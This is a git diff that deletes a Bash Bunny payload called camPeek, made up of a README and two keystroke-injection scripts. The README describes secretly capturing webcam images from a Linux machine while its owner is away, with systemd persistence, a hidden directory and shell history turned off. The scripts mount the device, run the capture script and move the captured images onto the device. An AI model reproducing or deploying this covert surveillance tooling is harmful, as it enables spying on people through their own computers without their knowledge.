diff --git a/camPeek/README.md b/camPeek/README.md deleted file mode 100644 index 4c6863c5..00000000 --- a/camPeek/README.md +++ /dev/null @@ -1,55 +0,0 @@ -## About: -* Title: camPeek -* Description: camPeek payload peeks through targets web cam and capture images and stores them in bunny. -* AUTHOR: drapl0n -* Version: 1.0 -* Category: Execution -* Target: Unix-like operating systems with systemd. -* Attackmodes: HID, Storage - -## CamPeek: camPeek payload is divided into two modules, First peeks through targets web cam and capture images and Second stores them in bunny. - -### Features: -* Robust Payload for capturing targets images. -* No additional dependencies required. -* Persistent. -* Autostart payload on boot. - -### Payload: -* Payload is divided into two modules: -1) Deployment: In this stage payload is deployed in targets system. -2) Exfiltration: Storing saved loot from targets system in bunny. - -### Payload Script's Workflow: -* Stop storing histroy. -* Grep bunny's mount point of bunny. -* Creating hidden directory in /var/tmp/..... for obfuscation. -* Copying ffmpeg and image capturing mechanism in target's system. -* Creating systemd service for persistance and triggering mechanism for autostart. - -### Changes to be made: -* Change time interval of capturing image, more the time interval target gets less suspicious, default time interval is 120 secs. Make changes in `systemBus` on line number `4`. - -### LED Status: -* `SETUP` : MAGENTA -* `ATTACK` : YELLOW -* `FINISH` : GREEN - -### Note: -* Download pre compiled static build of ffmpeg from: https://github.com/drapl0n/temp/releases/download/ffmpeg/ffmpeg and move it in camPeek directory. -* Due to big size of binary, it is not provided in this repo. -* Craete directory name `camPeek` in `/loot/` for storing captured images. - -### Directory Structure of payload components: -| FileName | Directory | -| -------------- | ----------------------------- | -| switch1/payload.txt | /payloads/switch1/ | -| switch2/payload.txt | /payloads/switch2/ | -| camPeek/ | /payloads/libray/ | - -### Usage: -1. Deploy first payload during absence of target using `switch1`. -2. Execute second payload during absence of target to store captured images in bunny using `switch2`. - -#### Support me if you like my work: -* https://twitter.com/drapl0n diff --git a/camPeek/switch1/payload.txt b/camPeek/switch1/payload.txt deleted file mode 100644 index c251c817..00000000 --- a/camPeek/switch1/payload.txt +++ /dev/null @@ -1,56 +0,0 @@ -# Title: camPeek -# Description: camPeek payload peeks through targets web cam and capture images. -# AUTHOR: drapl0n -# Version: 1.0 -# Category: Execution -# Target: GNU/Linux operating systems with systemd. -# Attackmodes: HID, Storage. - -LED SETUP -ATTACKMODE STORAGE HID -GET SWITCH_POSITION -LED ATTACK -Q DELAY 1000 -Q CTRL-ALT t -Q DELAY 1000 - -# [Prevent storing history] -Q STRING unset HISTFILE -Q ENTER -Q DELAY 200 - -# [Fetching BashBunny's block device] -Q STRING lol='$(lsblk | grep 1.8G)' -Q ENTER -Q DELAY 100 -Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' -Q ENTER -Q DELAY 200 - -# [Mounting BashBunny] -Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp -Q ENTER -Q DELAY 2000 -Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' -Q ENTER -Q DELAY 500 - -# [transfering payload script] -Q STRING cp -r '$mntt'/payloads/library/camPeek/payload.sh /tmp/ -Q ENTER -Q STRING chmod +x /tmp/payload.sh -Q ENTER -Q STRING /tmp/./payload.sh -Q ENTER -Q DELAY 12000 -Q STRING rm /tmp/payload.sh -Q ENTER -Q DELAY 500 - -# [Unmounting BashBunny] -Q STRING udisksctl unmount -b /dev/'$disk' -Q ENTER -Q DELAY 500 -Q STRING exit -Q ENTER -LED FINISH diff --git a/camPeek/switch2/payload.txt b/camPeek/switch2/payload.txt deleted file mode 100644 index b478df1f..00000000 --- a/camPeek/switch2/payload.txt +++ /dev/null @@ -1,43 +0,0 @@ -# Title: camPeek -# Description: camPeek payload's exfilteration module to move captured images to bunny. -# AUTHOR: drapl0n -# Version: 1.0 -# Category: Execution -# Target: GNU/Linux operating systems with systemd. -# Attackmodes: HID, Storage. - -LED SETUP -ATTACKMODE STORAGE HID -GET SWITCH_POSITION -LED ATTACK -Q DELAY 1000 -Q CTRL-ALT t -Q DELAY 1000 - -# [Prevent storing history] -Q STRING unset HISTFILE -Q ENTER -Q DELAY 200 - -# [Fetching BashBunny's block device] -Q STRING lol='$(lsblk | grep 1.8G)' -Q ENTER -Q DELAY 100 -Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' -Q ENTER -Q DELAY 200 - -# [Mounting BashBunny] -Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp -Q ENTER -Q DELAY 2000 -Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' -Q ENTER -Q DELAY 500 - -# [transfering payload script] -# create directory named camPeek in /loot/ -Q STRING mv /var/tmp/.system/sysLog/* '$mntt'/loot/camPeek/ \& -Q ENTER -Q STRING disown \&\& exit -Q ENTER